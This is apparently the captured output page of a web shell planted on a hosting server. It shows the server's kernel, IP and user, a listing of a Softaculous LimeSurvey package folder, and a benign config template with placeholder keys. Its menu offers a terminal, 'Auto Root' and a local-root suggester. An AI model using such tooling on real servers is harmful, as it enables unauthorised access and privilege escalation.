Linux sea-business-23.hostwindsdns.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 104.168.155.189 & Your IP : 216.73.217.84
Domains :
Cant Read [ /etc/named.conf ]
User : zvmcccat
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
lime /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-08-07 10:14
php53
[ DIR ]
drwxr-xr-x
2026-08-07 10:14
php56
[ DIR ]
drwxr-xr-x
2026-08-07 10:14
php71
[ DIR ]
drwxr-xr-x
2026-08-07 10:14
php81
[ DIR ]
drwxr-xr-x
2026-08-07 10:14
php82
[ DIR ]
drwxr-xr-x
2026-08-07 10:14
changelog.txt
48.74
KB
-rw-r--r--
2026-08-06 12:18
clone.php
4.76
KB
-rw-r--r--
2026-08-06 15:06
config.php
3.37
KB
-rw-r--r--
2026-06-12 12:31
edit.php
4.45
KB
-rw-r--r--
2026-08-06 15:06
edit.xml
433
B
-rw-r--r--
2023-09-15 14:50
extend.php
9.36
KB
-rw-r--r--
2026-08-06 15:06
fileindex.php
194
B
-rw-r--r--
2026-06-12 12:31
import.php
5.69
KB
-rw-r--r--
2026-08-06 15:06
info.xml
5.56
KB
-rw-r--r--
2026-08-06 12:18
install.js
921
B
-rw-r--r--
2021-12-23 14:54
install.php
5.09
KB
-rw-r--r--
2026-08-06 15:06
install.xml
3.56
KB
-rw-r--r--
2021-12-23 14:54
md5
1.72
KB
-rw-r--r--
2026-08-06 15:06
notes.txt
1.67
KB
-rw-r--r--
2021-12-23 14:54
security.php
829
B
-rw-r--r--
2026-06-12 12:31
sha256.php
19.18
KB
-rw-r--r--
2021-12-23 14:54
update_pass.php
534
B
-rw-r--r--
2023-02-27 12:49
upgrade.php
5.11
KB
-rw-r--r--
2026-08-06 15:06
upgrade.xml
371
B
-rw-r--r--
2021-12-23 14:54
Save
Rename
<?php if (!defined('BASEPATH')) exit('No direct script access allowed'); /* * LimeSurvey * Copyright (C) 2007-2026 The LimeSurvey Project Team * All rights reserved. * License: GNU/GPL License v3 or later, see LICENSE.php * LimeSurvey is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ /* WARNING!!! ONCE SET, ENCRYPTION KEYS SHOULD NEVER BE CHANGED, OTHERWISE ALL ENCRYPTED DATA COULD BE LOST !!! */ $config = array(); $config['encryptionnonce'] = '[[encryptionnonce]]'; $config['encryptionsecretboxkey'] = '[[encryptionsecretboxkey]]'; return $config;